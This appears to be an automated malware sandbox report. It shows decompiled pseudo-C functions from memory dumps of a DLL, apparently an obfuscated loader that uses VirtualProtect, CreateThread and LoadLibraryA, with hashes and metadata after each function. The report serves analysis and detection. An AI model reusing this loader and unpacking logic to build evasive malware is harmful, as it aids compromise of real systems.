                          				_t116 = _t123;
                          				if (_t116 == _t123) goto 0xd3713555;
                          				_t117 = _t116 + 2;
                          				goto 0xd371357e;
                          				E0000027E27ED371908C(0xf502ade, _t88,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				r8d = 0;
                          				if (_t88 == _t123) goto 0xd371357b;
                          				_t97 = _t110;
                          				_t31 =  *_t88();
                          				r8d = 0;
                          				_a16 = _t31;
                          				goto 0xd3713582;
                          				_t50 = r8d;
                          				_a16 = _t50;
                          				if (_t50 == r8d) goto 0xd37135b8;
                          				_t8 = _t97 - 1; // -1
                          				_t55 = _t8;
                          				r12w =  *(_t110 + _t106 * 2);
                          				if (r12w == 0x20) goto 0xd371359d;
                          				if (r12w != 9) goto 0xd37135a8;
                          				_t51 = _t55;
                          				_a16 = _t55;
                          				if (_t55 != r8d) goto 0xd3713587;
                          				if (_t51 == r8d) goto 0xd37135b8;
                          				r12w =  *_t110;
                          				if (r12w == 0x20) goto 0xd37135bf;
                          				if (r12w != 9) goto 0xd37135cb;
                          				_t111 = _t110 + 2;
                          				_a16 = _t51 - 1;
                          				goto 0xd37135a8;
                          				 *((intOrPtr*)(_t111 + _t88 * 2)) = r8w;
                          				if ( *_t111 == r8w) goto 0xd3713607;
                          				_v72 = _t123;
                          				r9d = 0;
                          				_t124 = _t88;
                          				_t33 = E0000027E27ED3718D50(_t89, _a8, _t111, _t111, _t117, _t88, _t124);
                          				r8d = 0;
                          				if (_t33 != r8d) goto 0xd371365a;
                          				_t112 = _t117;
                          				if (_t117 == _t124) goto 0xd371360c;
                          				goto 0xd3713519;
                          				if (_t33 != r8d) goto 0xd371365a;
                          				if (E0000027E27ED37169A0(_t33 - r8d, _t89, _t88,  &_a24, _t117, _t119,  &_a16, _t130) != 0) goto 0xd371365c;
                          				r9d = _a16;
                          				E0000027E27ED37190D8(_t89, _a8, _t112, _t117, _a24);
                          				HeapFree(??, ??, ??);
                          				goto 0xd371365c;
                          				E0000027E27ED371908C(0x77c56b19, _t88,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t88 == _t112) goto 0xd3713674;
                          				 *_t88();
                          				HeapFree(??, ??, ??);
                          				goto 0xd3713689;
                          				HeapFree(??, ??, ??);
                          				goto 0xd371369e;
                          				return 8;
                          			}




























                          0x27ed37134a4
                          0x27ed37134a4
                          0x27ed37134a4
                          0x27ed37134a4
                          0x27ed37134a9
                          0x27ed37134c6
                          0x27ed37134d5
                          0x27ed37134de
                          0x27ed37134e9
                          0x27ed37134f4
                          0x27ed37134fc
                          0x27ed3713501
                          0x27ed3713504
                          0x27ed371350a
                          0x27ed3713510
                          0x27ed3713516
                          0x27ed3713519
                          0x27ed3713523
                          0x27ed3713529
                          0x27ed371352f
                          0x27ed3713536
                          0x27ed371353c
                          0x27ed371353e
                          0x27ed3713544
                          0x27ed371354f
                          0x27ed3713553
                          0x27ed371355e
                          0x27ed3713563
                          0x27ed3713569
                          0x27ed371356b
                          0x27ed371356e
                          0x27ed3713570
                          0x27ed3713575
                          0x27ed3713579
                          0x27ed371357b
                          0x27ed371357e
                          0x27ed3713585
                          0x27ed3713587
                          0x27ed3713587
                          0x27ed371358a
                          0x27ed3713594
                          0x27ed371359b
                          0x27ed371359d
                          0x27ed371359f
                          0x27ed37135a6
                          0x27ed37135ab
                          0x27ed37135ad
                          0x27ed37135b6
                          0x27ed37135bd
                          0x27ed37135bf
                          0x27ed37135c5
                          0x27ed37135c9
                          0x27ed37135cd
                          0x27ed37135d6
                          0x27ed37135dd
                          0x27ed37135e2
                          0x27ed37135e5
                          0x27ed37135eb
                          0x27ed37135f0
                          0x27ed37135f8
                          0x27ed37135fa
                          0x27ed3713600
                          0x27ed3713602
                          0x27ed371360a
                          0x27ed3713627
                          0x27ed3713629
                          0x27ed371363e
                          0x27ed3713652
                          0x27ed3713658
                          0x27ed3713665
                          0x27ed371366d
                          0x27ed3713672
                          0x27ed371367c
                          0x27ed3713682
                          0x27ed3713691
                          0x27ed3713697
                          0x27ed37136b7

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID:
                          • API String ID: 3901518246-0
                          • Opcode ID: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                          • Instruction ID: ff67b36a90a521c1c4ea8233f13db6b34f2d5120440e15d23d2463f841374d7e
                          • Opcode Fuzzy Hash: c7f4851af72390d08a83b741b1e5df915c470d94f4f546358617c873bfd904c4
                          • Instruction Fuzzy Hash: 7C512A73718E50C6FFB49726950836FA695B38EBC0F96A0559E4D43BDADA38C8828710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C079BA0(void* __rax, void* __rcx, void* __rdx, long long __r8, void* __r10, void* __r11, intOrPtr _a8, long long _a24, intOrPtr _a32, intOrPtr _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80, intOrPtr _a96, intOrPtr _a104) {
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v84;
                          				intOrPtr _v88;
                          				intOrPtr _t88;
                          				signed long long _t121;
                          				long long _t123;
                          				intOrPtr _t126;
                          				signed long long _t130;
                          
                          				_a32 = r9d;
                          				_a24 = __r8;
                          				r10d = _a80;
                          				r11d = _a72;
                          				r11d = r11d + 0xffffd852;
                          				r8d = __rdx - 0x882;
                          				_a80 = __rcx - 0x38e9;
                          				_v84 = r8d;
                          				_t88 = __rdx - 0x27ae;
                          				r8d = __rax - 0x113b;
                          				_v76 = _t88;
                          				_a72 = r11d;
                          				_a96 = _a104 + 0x10a3;
                          				_v88 = __r10 - 0x113b;
                          				_a56 = _a48 + 0xffffdfce;
                          				_v72 = __rax + 0x106;
                          				_a8 = __rax + 0x1371;
                          				_t121 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x2e8)) + 0x3c)) +  *((intOrPtr*)(__r8 + 0x2e8));
                          				 *(__r8 + 0x2f0) = _t121;
                          				_t130 = __r8 + 0x1f0;
                          				_a104 = __rdx + 0x1033;
                          				 *(__r8 + 0x2f8) = _t121 ^ 0x000023f7;
                          				if ( *_t130 -  *((intOrPtr*)(__r8 + 0x1c8)) > 0) goto 0x8c079cd0;
                          				 *(__r8 + 0x198) = " periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
                          				 *(__r8 + 0x198) =  *(__r8 + 0x198) | _t130;
                          				_t123 =  *((intOrPtr*)(__r8 + 0x2d8));
                          				 *((long long*)(__r8 + 0x318)) = _t123;
                          				_a48 = __r10 - 0x283;
                          				_a64 = __r10 - 0x64c;
                          				 *((long long*)(__r8 + 0x320)) =  *((intOrPtr*)(_t123 + 0x3c)) + _t123;
                          				 *(__r8 + 0x120) = 0x1137;
                          				 *(__r8 + 0xc8) =  *(__r8 + 0xc8) * ( *(__r8 + 0x1c0) | 0x00003595);
                          				 *((long long*)(__r8 + 0x308)) =  *((intOrPtr*)(__r8 + 0x2d8));
                          				 *(__r8 + 0x198) =  *(__r8 + 0x198) + 0xfffffef0 -  *((intOrPtr*)(__r8 + 0x1c8));
                          				_t126 =  *((intOrPtr*)(__r8 + 0x140));
                          				 *(__r8 + 0x58) =  *(__r8 + 0x58) |  *(_t126 + 0x198);
                          				 *(_t126 + 0x198) =  *(_t126 + 0x198) + 1;
                          				 *( *(__r8 + 0x1c0) + 0x48) =  *( *(__r8 + 0x1c0) + 0x48) ^ ( *(__r8 + 0x120) | 0x0000343a);
                          				if (r11d == _t130 - 0x1371) goto 0x8c079dce;
                          				if (_t88 - __r11 + 0x2103 >= 0) goto 0x8c079de1;
                          				 *((intOrPtr*)(__r8 + 0x310)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x320)) + 0x50));
                          				 *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) =  *( *((intOrPtr*)(__r8 + 0x1c8)) + 0xc8) ^  *(__r8 + 0xe0) * 0x00002598;
                          				return __r8 + 0x927;
                          			}












                          0x7ff88c079ba0
                          0x7ff88c079ba5
                          0x7ff88c079bc2
                          0x7ff88c079bcd
                          0x7ff88c079bdf
                          0x7ff88c079be6
                          0x7ff88c079bed
                          0x7ff88c079bf4
                          0x7ff88c079bfc
                          0x7ff88c079c02
                          0x7ff88c079c09
                          0x7ff88c079c22
                          0x7ff88c079c2a
                          0x7ff88c079c38
                          0x7ff88c079c46
                          0x7ff88c079c59
                          0x7ff88c079c67
                          0x7ff88c079c72
                          0x7ff88c079c7b
                          0x7ff88c079c82
                          0x7ff88c079c89
                          0x7ff88c079ca4
                          0x7ff88c079cc0
                          0x7ff88c079cc9
                          0x7ff88c079cd0
                          0x7ff88c079cde
                          0x7ff88c079cec
                          0x7ff88c079cf3
                          0x7ff88c079cfa
                          0x7ff88c079d08
                          0x7ff88c079d1d
                          0x7ff88c079d33
                          0x7ff88c079d41
                          0x7ff88c079d56
                          0x7ff88c079d5d
                          0x7ff88c079d6b
                          0x7ff88c079d6f
                          0x7ff88c079d8a
                          0x7ff88c079d97
                          0x7ff88c079da2
                          0x7ff88c079dae
                          0x7ff88c079dc7
                          0x7ff88c079de0

                          APIs
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087CFC
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087E18
                          • CreateThread.KERNEL32 ref: 00007FF88C07A238
                          Strings
                          • periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard , xrefs: 00007FF88C079CC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ProtectVirtual$CreateThread
                          • String ID: periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard
                          • API String ID: 3076554488-3474123047
                          • Opcode ID: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                          • Instruction ID: 8cfe6e283ae78440c1ff5fe3a286a1bfa4adfc8e3b0a0b05804dc79461d73767
                          • Opcode Fuzzy Hash: 4263ff401d75dabcc09657429b698b9b49345b6e88aabbc26032a9ba9cf8f7b2
                          • Instruction Fuzzy Hash: 020249736187D48BD7A5CF19E485BDAB7A8F788784F01412AEB8943B58DB38DA54CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 30%
                          			E00007FF87FF88C0790B0(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __r8, void* __r11, long long _a8, signed int _a16, signed int _a24, signed int _a40, signed int _a48, signed int _a56, signed int _a64, signed int _a72, signed int _a80, signed int _a96, signed int _a104, signed int _a112) {
                          				intOrPtr _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				intOrPtr _v88;
                          				signed int _v96;
                          				signed int _v104;
                          				signed int _v112;
                          				signed int _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				signed int _v144;
                          				signed int _v152;
                          				signed int _v160;
                          				signed int _v168;
                          				void* __rdi;
                          				signed int _t159;
                          				intOrPtr _t162;
                          				signed int _t164;
                          				signed int _t172;
                          				signed int _t173;
                          				intOrPtr _t198;
                          				signed int _t214;
                          				void* _t229;
                          				intOrPtr _t243;
                          				signed int _t256;
                          				signed long long _t259;
                          				signed long long _t260;
                          				signed long long _t262;
                          				long long _t269;
                          				signed long long _t272;
                          				void* _t273;
                          				void* _t284;
                          				signed long long _t285;
                          				void* _t290;
                          				void* _t293;
                          				void* _t294;
                          				void* _t295;
                          				void* _t296;
                          
                          				_a8 = __rbx;
                          				r12d = __rdx - 0x3a59;
                          				r11d = _a72;
                          				r13d = __rdx - 0x1663;
                          				r15d = _a56;
                          				r14d = _a96;
                          				r8d = r8d + 0xfffff374;
                          				_a40 = __rcx - 0x329d;
                          				r10d = _t296 + 0x4c0;
                          				_a24 = _a80 + 0x2b1;
                          				_v68 = r12d;
                          				_v72 = __r11 - 0x3189;
                          				r11d = r11d + 0x4dd;
                          				_a64 = r10d;
                          				_a80 = _a64 + 0xfffffbf4;
                          				r10d = r10d + 0xffffee61;
                          				_a104 = r8d;
                          				r8d = __rax - 0x19bd;
                          				r9d = __rax - 0x202;
                          				_a72 = r8d;
                          				_a16 = r9d;
                          				_a56 = __rcx + 0x2f8;
                          				r9d = r9d + 0xffffed0f;
                          				_v64 = _t295 + 0x13eb;
                          				_v96 = _t293 + 0x38e9;
                          				r8d = _t294 - 0x2f3;
                          				_v104 = r10d;
                          				_v112 = r11d;
                          				_v120 = r14d;
                          				_v128 = __r8 + 0x125d;
                          				_t256 = _a48;
                          				_v136 = _t294 + 0x119f;
                          				_v144 = r15d;
                          				_v152 = _a112 + 0xffffeb0d;
                          				_v160 = _t256;
                          				_v168 = __rcx + 0x278;
                          				_t159 = E00007FF87FF88C090720(__rcx, _t273, __r8, _t284, _t290);
                          				_t259 =  *((intOrPtr*)(_t256 + 0x23c));
                          				r8d = 0x2032;
                          				 *(_t256 + 0x158) = _t259;
                          				_t285 =  *((intOrPtr*)(_t256 + 0x1a0));
                          				_a96 = _t159;
                          				if (( *(_t285 + 0x130) ^ 0x000003c5) - r8d < 0) goto 0x8c07929f;
                          				asm("o16 nop [eax+eax]");
                          				_t269 =  *((intOrPtr*)(_t256 + 0xc8)) + (_t285 | __r8);
                          				r8d = r8d + 1;
                          				 *((long long*)(_t256 + 0xc8)) = _t269;
                          				_t260 = _t259 ^ 0x000003c5;
                          				if (r8d - _t260 <= 0) goto 0x8c079280;
                          				_t243 =  *((intOrPtr*)(_t256 + 0x1c8));
                          				_v120 = 0x8c093850;
                          				_v128 = 0x40;
                          				r8d = 0x2032;
                          				_v136 = 0xbb;
                          				r9d = 0x2103;
                          				_v144 =  *((intOrPtr*)(_t243 + 0xb0)) - 0x27ab;
                          				_v152 =  *((intOrPtr*)(_t256 + 0x130)) - 0x22cb;
                          				_v160 = 0x30d5;
                          				_v168 = _t256;
                          				_t162 = E00007FF87FF88C08F290(0x2598, 0x27b2, _t256, _t273, __r8, 0x8c093850);
                          				r11d = _a72;
                          				r11d = r11d + 0x4ca;
                          				r9d = _t260 - 0x77c;
                          				_v136 = _t256;
                          				r10d = _t260 - 0x522;
                          				 *((intOrPtr*)(_t256 + 0x23c)) = _t162;
                          				r8d = _t269 - 0x16b5;
                          				 *((long long*)(_t256 + 0x198)) =  *((long long*)(_t256 + 0x198)) + 0x228c;
                          				_v144 = _t273 - 0x1337;
                          				_v152 = r9d;
                          				r9d = r8d;
                          				_v160 = r10d;
                          				_v168 = r11d;
                          				_t164 = E00007FF87FF88C08DA50(_t260, 0x8c093850, _t285 + 0x130);
                          				r10d = _a112;
                          				_a16 = _t164;
                          				r10d = r10d + 0xfffff8a0;
                          				if (r12d == _t243 - 0x17b) goto 0x8c0795f7;
                          				_t86 = _t269 - 0x13eb; // -5099
                          				if (_t295 + 0x13eb == _t86) goto 0x8c07941a;
                          				 *(_t256 + 0x158) =  *((intOrPtr*)(_t256 + 0x98));
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0x130)) + 0x1045 == 0x343a) goto 0x8c0795f7;
                          				asm("o16 nop [eax+eax]");
                          				 *(_t256 + 0x80) =  *(_t256 + 0x80) ^ 0x000027b2;
                          				if (0x343b != _t260) goto 0x8c0793f0;
                          				goto 0x8c0795f7;
                          				if ( *(_t256 + 0x110) - ((r10d ^ 0x000027b2) &  *(_t256 + 0x28)) > 0) goto 0x8c0795a4;
                          				_t214 =  *_t256;
                          				r11d =  *(_t256 + 0x110);
                          				r11d = r11d | _a96;
                          				r12d =  *(_t256 + 0x228);
                          				r11d = r11d ^ _t214;
                          				r9d =  *(_t256 + 0x1c0);
                          				r14d = _t269 + _t269;
                          				r8d =  *(_t256 + 0x90);
                          				r15d = r9d;
                          				r8d = r8d & 0x00000188;
                          				r15d = r15d ^ _a80;
                          				r8d = r8d | 0x00002626;
                          				_t262 = _t273 + 0x0000228c ^ _a40;
                          				r12d = r12d * _t214;
                          				 *(_t256 + 0x70) =  *(_t256 + 0x70) - _t262;
                          				_t198 =  *((intOrPtr*)(_t256 + 0x1e0));
                          				r12d = r12d &  *(_t256 + 0x1b8);
                          				_a112 = ( *(_t256 + 0x80) ^ 0xfffffe7f) & 0x00002598;
                          				_t172 =  *(_t256 + 0x188);
                          				r13d = _t172;
                          				r13d = r13d | _a24;
                          				_t173 =  *(_t256 + 0x200);
                          				r13d = r13d - r10d;
                          				r10d = _a72;
                          				r10d = r10d + _t198;
                          				r10d = r10d + _a16;
                          				_v88 = ( *(_t256 + 0x1f8) | _v72) + _a64;
                          				_v96 = r10d;
                          				_v104 = r11d;
                          				_v112 = _t256;
                          				_v120 = _v68 ^ 0x000027ae;
                          				_v128 =  *(_t256 + 0x1b0) * _t173;
                          				_v136 = _t173 & r10d ^  *(_t256 + 0x40);
                          				_v144 = _a64 + _t198 ^ _t172;
                          				_v152 = r14d;
                          				_v160 = r15d;
                          				_v168 = r12d;
                          				E00007FF87FF88C08ED60(_a112, r13d, _t229, _a40, _t256, _t262, _t269,  *(_t256 + 0x80) ^ 0x000027b2,  *((intOrPtr*)(_t256 + 0x30)), _t285 + 0x130);
                          				 *(_t256 + 0x200) =  *(_t256 + 0x200) - _t262;
                          				DeleteCriticalSection(??);
                          				goto 0x8c0795f7;
                          				if ( *(_t256 + 0x90) == ( *((intOrPtr*)(_t256 + 0xc8)) -  *((intOrPtr*)(_t256 + 0x60)) ^ 0x00002598)) goto 0x8c0795f7;
                          				_t272 =  *(_t256 + 0x120) |  *(_t256 + 0x70);
                          				if (r13d - _t272 >= 0) goto 0x8c0795f7;
                          				r13d = r13d + 1;
                          				if (r13d - _t272 < 0) goto 0x8c0795e2;
                          				 *((long long*)(_t256 + 0x220)) =  *((intOrPtr*)(_t256 + 0x220)) + (r12d ^ 0x000030d5);
                          				return _a56 + 0xfffff21d;
                          			}









































                          0x7ff88c0790b0
                          0x7ff88c0790ce
                          0x7ff88c0790d5
                          0x7ff88c0790dd
                          0x7ff88c0790e4
                          0x7ff88c0790f3
                          0x7ff88c0790fb
                          0x7ff88c07910f
                          0x7ff88c079123
                          0x7ff88c079136
                          0x7ff88c07914a
                          0x7ff88c079152
                          0x7ff88c079159
                          0x7ff88c07916c
                          0x7ff88c079174
                          0x7ff88c07917b
                          0x7ff88c079189
                          0x7ff88c079191
                          0x7ff88c079198
                          0x7ff88c07919f
                          0x7ff88c0791ad
                          0x7ff88c0791bc
                          0x7ff88c0791ca
                          0x7ff88c0791d7
                          0x7ff88c0791ed
                          0x7ff88c0791f1
                          0x7ff88c0791f8
                          0x7ff88c079203
                          0x7ff88c079208
                          0x7ff88c07920d
                          0x7ff88c079211
                          0x7ff88c079219
                          0x7ff88c07921d
                          0x7ff88c079222
                          0x7ff88c079226
                          0x7ff88c07922b
                          0x7ff88c07922f
                          0x7ff88c079234
                          0x7ff88c07923b
                          0x7ff88c079241
                          0x7ff88c079248
                          0x7ff88c07924f
                          0x7ff88c079269
                          0x7ff88c079275
                          0x7ff88c079280
                          0x7ff88c079283
                          0x7ff88c079286
                          0x7ff88c079290
                          0x7ff88c07929d
                          0x7ff88c07929f
                          0x7ff88c0792ad
                          0x7ff88c0792b7
                          0x7ff88c0792bc
                          0x7ff88c0792c2
                          0x7ff88c0792c7
                          0x7ff88c0792df
                          0x7ff88c0792e8
                          0x7ff88c0792f1
                          0x7ff88c0792f9
                          0x7ff88c0792fe
                          0x7ff88c079311
                          0x7ff88c079320
                          0x7ff88c079327
                          0x7ff88c07932e
                          0x7ff88c079333
                          0x7ff88c07933a
                          0x7ff88c079347
                          0x7ff88c07934e
                          0x7ff88c07935f
                          0x7ff88c079369
                          0x7ff88c07936e
                          0x7ff88c079371
                          0x7ff88c079376
                          0x7ff88c07937b
                          0x7ff88c079380
                          0x7ff88c07938a
                          0x7ff88c079391
                          0x7ff88c0793a8
                          0x7ff88c0793ae
                          0x7ff88c0793b6
                          0x7ff88c0793c4
                          0x7ff88c0793dd
                          0x7ff88c0793ea
                          0x7ff88c0793f9
                          0x7ff88c079413
                          0x7ff88c079415
                          0x7ff88c07942e
                          0x7ff88c079434
                          0x7ff88c07943c
                          0x7ff88c079443
                          0x7ff88c07944b
                          0x7ff88c079452
                          0x7ff88c079455
                          0x7ff88c07945c
                          0x7ff88c079460
                          0x7ff88c079467
                          0x7ff88c079471
                          0x7ff88c079478
                          0x7ff88c079480
                          0x7ff88c079492
                          0x7ff88c079495
                          0x7ff88c079499
                          0x7ff88c07949d
                          0x7ff88c0794b0
                          0x7ff88c0794bc
                          0x7ff88c0794c3
                          0x7ff88c0794c9
                          0x7ff88c0794ce
                          0x7ff88c0794d1
                          0x7ff88c0794d7
                          0x7ff88c0794f1
                          0x7ff88c079500
                          0x7ff88c07950a
                          0x7ff88c079522
                          0x7ff88c079526
                          0x7ff88c07952b
                          0x7ff88c079530
                          0x7ff88c079535
                          0x7ff88c079540
                          0x7ff88c079544
                          0x7ff88c079548
                          0x7ff88c07954c
                          0x7ff88c079551
                          0x7ff88c079556
                          0x7ff88c07955b
                          0x7ff88c07957e
                          0x7ff88c07959c
                          0x7ff88c0795a2
                          0x7ff88c0795bc
                          0x7ff88c0795c5
                          0x7ff88c0795cf
                          0x7ff88c0795e2
                          0x7ff88c0795ee
                          0x7ff88c0795f0
                          0x7ff88c07961d

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CriticalDeleteSection
                          • String ID: @
                          • API String ID: 166494926-2766056989
                          • Opcode ID: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                          • Instruction ID: 698841ccba993c2d21d3edb3e5ae910f092bfa3d26102a2898fa983a4ce18302
                          • Opcode Fuzzy Hash: 67b7e4b7d29307a53d3832543a141100a8672ce9b9caf98ece6757bfb83f9feb
                          • Instruction Fuzzy Hash: E9D198736186C58BD764CF64E494BEAB7A0F788788F044139DB8A47B48DB38E990CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C07FB70(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                          				signed long long _t15;
                          				signed long long _t16;
                          				void* _t24;
                          				signed long long _t33;
                          
                          				_t15 = _t33;
                          				 *((long long*)(_t15 + 8)) = __rbx;
                          				 *((long long*)(_t15 + 0x10)) = __rbp;
                          				 *((long long*)(_t15 + 0x18)) = __rsi;
                          				 *((long long*)(_t15 + 0x20)) = __rdi;
                          				_t16 = _t15 | 0xffffffff;
                          				_t24 = _t16 + 1;
                          				if ( *((char*)(__rcx + _t24)) != 0) goto 0x8c07fba0;
                          				if (_t24 + __rdx - _t16 - __r8 <= 0) goto 0x8c07fbdb;
                          				return __rdx + 0xb;
                          			}







                          0x7ff88c07fb70
                          0x7ff88c07fb73
                          0x7ff88c07fb77
                          0x7ff88c07fb7b
                          0x7ff88c07fb7f
                          0x7ff88c07fb8d
                          0x7ff88c07fba0
                          0x7ff88c07fba7
                          0x7ff88c07fbb7
                          0x7ff88c07fbda

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                          • Instruction ID: c2762f47373667af1a638b234d6614bcb71260b7b803f54eb794596b8fcc22dd
                          • Opcode Fuzzy Hash: a5c22a8428412bf3b9384cd49374f5d3c3e3a1ab06a7deca538eca9ebce93d66
                          • Instruction Fuzzy Hash: 02310722B1869549EF249A32E9057BA6A91BB96FE4F148331EE6C07BC9CF3DD501C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E00007FF87FF88C08B9B0(intOrPtr __edx, signed int __rcx, signed int __rdx, long long __rsi, signed int __rbp, void* __r8, long long __r9, long long __r12, long long __r13, long long __r14, void* _a8, intOrPtr _a16, signed int _a24, signed long long _a32) {
                          				void* _v32;
                          				void* _v40;
                          				void* _v48;
                          				void* _v56;
                          				signed int _t163;
                          				void* _t183;
                          				void* _t186;
                          				void* _t187;
                          				void* _t189;
                          				signed long long _t202;
                          				long long _t226;
                          				signed long long _t229;
                          				signed long long _t235;
                          				signed int _t245;
                          				signed int _t265;
                          				intOrPtr _t269;
                          				signed long long _t276;
                          				signed long long _t281;
                          				signed long long _t284;
                          				signed long long _t285;
                          				intOrPtr _t291;
                          				struct HINSTANCE__* _t292;
                          				intOrPtr* _t294;
                          				signed long long _t296;
                          				long long* _t299;
                          				void* _t304;
                          				signed long long _t309;
                          				intOrPtr _t312;
                          				intOrPtr _t314;
                          				void* _t316;
                          				signed long long _t318;
                          				intOrPtr* _t322;
                          				signed long long* _t326;
                          				CHAR* _t328;
                          
                          				_t316 = _t304;
                          				 *((long long*)(_t316 + 0x20)) = __r9;
                          				 *(_t316 + 0x18) = r8d;
                          				_a16 = __edx;
                          				_t314 =  *((intOrPtr*)(__rcx + 0x118));
                          				_t245 = __rcx;
                          				r15d = r8d;
                          				if ( *((intOrPtr*)(_t314 + 0x88 + __rcx * 8)) == 0) goto 0x8c08beec;
                          				 *((long long*)(_t316 - 0x30)) = __r13;
                          				r13d =  *((intOrPtr*)(_t314 + 0x90));
                          				 *(__rcx + 0xc8) =  *(__rcx + 0xc8) | 0x0acff869;
                          				_t322 = __r13 + 0xc +  *((intOrPtr*)(__rcx + 0xc0));
                          				if ( *_t322 == 0) goto 0x8c08bedc;
                          				 *((long long*)(_t316 + 8)) = __rbp;
                          				 *((long long*)(_t316 - 0x20)) = __rsi;
                          				 *((long long*)(_t316 - 0x28)) = __r12;
                          				 *((long long*)(_t316 - 0x38)) = __r14;
                          				_t19 = _t245 + 0x198; // 0x229b
                          				_t326 = _t19;
                          				_t202 =  *(__rcx + 0x188) ^  *(__rcx + 0x120) ^ 0x00003189;
                          				 *(__rcx + 0x120) = _t202;
                          				LoadLibraryA(_t328);
                          				_t318 = _t202;
                          				if (_t202 == 0) goto 0x8c08bea2;
                          				 *_t326 = _t326;
                          				 *(__rcx + 0x1e0) =  *(__rcx + 0x228) ^ __rbp;
